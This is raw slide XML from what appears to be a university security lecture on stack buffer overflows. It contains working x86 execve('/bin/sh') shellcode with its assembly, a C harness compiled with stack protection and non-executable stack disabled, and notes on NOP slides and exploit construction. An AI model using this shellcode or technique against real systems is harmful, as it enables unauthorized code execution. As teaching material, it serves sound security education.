              <a:rPr lang="da-DK" sz="2800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2800" dirty="0"/>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p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0870" y="2667000"/>
            <a:ext cx="5181600" cy="13716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da-DK" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x73\x68\x68\x2f\x62\x69\x6e\x89”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\xe3\xb0\x0b\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x80”;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5712767"/>
            <a:ext cx="144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Shellcode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191000"/>
            <a:ext cx="2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Executable String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096000" y="1295400"/>
            <a:ext cx="2590800" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -36607"/>
              <a:gd name="adj2" fmla="val 8650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Notice no NULL chars. Why?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22879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492875"/>
            <a:ext cx="771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Author: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>kernel_panik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>www.shell-storm.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/files/shellcode-752.php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524000"/>
            <a:ext cx="74186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Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char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code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>              "\x73\x68\x68\x2f\x62\x69\x6e\x89"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>              "\xe3\xb0\x0b\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x80";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> ("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Shellcode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length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> : %d bytes\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p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(*f)()=(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(*)())</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> f();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK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3810000" y="5093532"/>
            <a:ext cx="4422789" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -o shellcode -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-stack-protector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-z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execstack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shellcode.c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96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492875"/>
            <a:ext cx="771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Author: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>kernel_panik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>www.shell-storm.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/files/shellcode-752.php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1295400"/>
            <a:ext cx="3276600" cy="4343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/>
              <a:t>xor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/>
              <a:t>ecx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en-US" sz="2800" dirty="0"/>
              <a:t>push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de-DE" sz="2800" dirty="0"/>
              <a:t>push 0x68732f2f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>push 0x6e69622f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err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" sz="2800" dirty="0"/>
              <a:t>mov al, 0xb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2800" dirty="0"/>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p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5712767"/>
            <a:ext cx="144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Shellcode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73770"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6720396" y="1597967"/>
          <a:ext cx="1143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0x68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0x73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0x2f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0x2f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0x6e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0x69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0x62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0x2f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0" y="5369279"/>
            <a:ext cx="63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esp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8700"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7924800" y="1597967"/>
          <a:ext cx="1143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accent5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7788"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4038600" y="3124200"/>
          <a:ext cx="200406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ebx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esp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ecx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eax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6124616" y="5600112"/>
            <a:ext cx="595780" cy="3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2342" y="4569767"/>
            <a:ext cx="150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Registers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5031432"/>
            <a:ext cx="16002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6388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Factors affecting the stack frame:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>statically declared buffers may be padded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>what about space for callee-save </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>regs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>[advanced] what if some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> are in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>regs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> only?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>[advanced] what if compiler reorder</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>local variables on stack?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> is your friend!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t> quick reference)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Don’t just brute force or guess offsets.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Think!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71259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nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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441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WARNING:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Environment changes address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>buf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$ OLDPWD=“” ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vuln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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>vs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ OLDPWD=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vuln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81231"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6838918" y="1479548"/>
          <a:ext cx="1461558" cy="4665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env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1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4876800" y="2514600"/>
            <a:ext cx="1600200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 64078"/>
              <a:gd name="adj2" fmla="val -80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Overwrite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> with any position in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> slide ok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76800" y="3702440"/>
            <a:ext cx="3423676" cy="1707760"/>
            <a:chOff x="4876800" y="3702440"/>
            <a:chExt cx="3423676" cy="1707760"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6838918" y="4480120"/>
              <a:ext cx="1461558" cy="9144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0x90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0x90</a:t>
              </a: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6324600" y="4495800"/>
              <a:ext cx="381000" cy="914400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876800" y="4800600"/>
              <a:ext cx="1219200" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 74365"/>
                <a:gd name="adj2" fmla="val -23953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nop</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> slide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8918" y="3702440"/>
              <a:ext cx="1461558" cy="762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execve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Snip Single Corner Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5181599"/>
            <a:ext cx="3810000" cy="1311275"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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err="1"/>
              <a:t>Protip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nop’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (e.g., 0x90) into shellcode allow for slack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40007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generate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> for a basic buffer overflow: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size of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stack frame up to head of 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Overflow buffer with the right size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b="1" i="1" dirty="0"/>
              <a:t>computation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>                     +                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1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66841"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1028700" y="3612196"/>
          <a:ext cx="7086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rc 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="3688396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8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Attacks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6328" y="4267200"/>
            <a:ext cx="42318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Assigned Reading:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Exploiting Format String Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / Team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Teso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6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/>
              <a:t>If an attacker is able to provide the format string to an ANSI C format function in part or as a whole, a format string vulnerability is present.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>teso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172200" y="2286002"/>
            <a:ext cx="2590800" cy="373379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/>
              </a:rPr>
              <a:t>Black</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="appst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40" y="2895599"/>
            <a:ext cx="2377760" cy="208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0596" y="4339535"/>
            <a:ext cx="2030604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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>format c: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" y="2286002"/>
            <a:ext cx="2590800" cy="373379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Cambria"/>
              </a:rPr>
              <a:t>White</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20" descr="appst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0" y="2895600"/>
            <a:ext cx="2377760" cy="2084848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18" descr="wifi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2" y="3943643"/>
            <a:ext cx="1047995" cy="10038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Rounded Rectangular Callout 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1501280"/>
            <a:ext cx="1447800" cy="708520"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 35728"/>
              <a:gd name="adj2" fmla="val 274264"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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Cambria"/>
              </a:rPr>
              <a:t>Bug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92480" y="1289579"/>
            <a:ext cx="2795437" cy="3860431"/>
            <a:chOff x="3092478" y="1289579"/>
            <a:chExt cx="2795437" cy="3860430"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10" descr="bom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34412">
              <a:off x="3104415" y="1964402"/>
              <a:ext cx="3352800" cy="2003154"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11" descr="arrow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5549">
              <a:off x="3092478" y="3352800"/>
              <a:ext cx="2795437" cy="1797209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7944" y="589003"/>
            <a:ext cx="6108117" cy="80021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5200" dirty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  <a:t>Find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5200" i="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5200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Exploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5200" i="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5200" dirty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  <a:t>Bugs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Freeform 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668746" y="3778830"/>
            <a:ext cx="1083854" cy="1301485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 508000 w 1367174"/>
              <a:gd name="connsiteY0" fmla="*/ 16544 h 1301485"/>
              <a:gd name="connsiteX1" fmla="*/ 343647 w 1367174"/>
              <a:gd name="connsiteY1" fmla="*/ 91250 h 1301485"/>
              <a:gd name="connsiteX2" fmla="*/ 283883 w 1367174"/>
              <a:gd name="connsiteY2" fmla="*/ 106191 h 1301485"/>
              <a:gd name="connsiteX3" fmla="*/ 239059 w 1367174"/>
              <a:gd name="connsiteY3" fmla="*/ 121132 h 1301485"/>
              <a:gd name="connsiteX4" fmla="*/ 179294 w 1367174"/>
              <a:gd name="connsiteY4" fmla="*/ 165956 h 1301485"/>
              <a:gd name="connsiteX5" fmla="*/ 89647 w 1367174"/>
              <a:gd name="connsiteY5" fmla="*/ 225721 h 1301485"/>
              <a:gd name="connsiteX6" fmla="*/ 74706 w 1367174"/>
              <a:gd name="connsiteY6" fmla="*/ 285485 h 1301485"/>
              <a:gd name="connsiteX7" fmla="*/ 44824 w 1367174"/>
              <a:gd name="connsiteY7" fmla="*/ 315368 h 1301485"/>
              <a:gd name="connsiteX8" fmla="*/ 29883 w 1367174"/>
              <a:gd name="connsiteY8" fmla="*/ 405015 h 1301485"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 1367174"/>
              <a:gd name="connsiteY9" fmla="*/ 494662 h 1301485"/>
              <a:gd name="connsiteX10" fmla="*/ 44824 w 1367174"/>
              <a:gd name="connsiteY10" fmla="*/ 927956 h 1301485"/>
              <a:gd name="connsiteX11" fmla="*/ 59765 w 1367174"/>
              <a:gd name="connsiteY11" fmla="*/ 972780 h 1301485"/>
              <a:gd name="connsiteX12" fmla="*/ 119530 w 1367174"/>
              <a:gd name="connsiteY12" fmla="*/ 1047485 h 1301485"/>
              <a:gd name="connsiteX13" fmla="*/ 179294 w 1367174"/>
              <a:gd name="connsiteY13" fmla="*/ 1107250 h 1301485"/>
              <a:gd name="connsiteX14" fmla="*/ 194235 w 1367174"/>
              <a:gd name="connsiteY14" fmla="*/ 1152074 h 1301485"/>
              <a:gd name="connsiteX15" fmla="*/ 298824 w 1367174"/>
              <a:gd name="connsiteY15" fmla="*/ 1196897 h 1301485"/>
              <a:gd name="connsiteX16" fmla="*/ 343647 w 1367174"/>
              <a:gd name="connsiteY16" fmla="*/ 1226780 h 1301485"/>
              <a:gd name="connsiteX17" fmla="*/ 403412 w 1367174"/>
              <a:gd name="connsiteY17" fmla="*/ 1241721 h 1301485"/>
              <a:gd name="connsiteX18" fmla="*/ 493059 w 1367174"/>
              <a:gd name="connsiteY18" fmla="*/ 1271603 h 1301485"/>
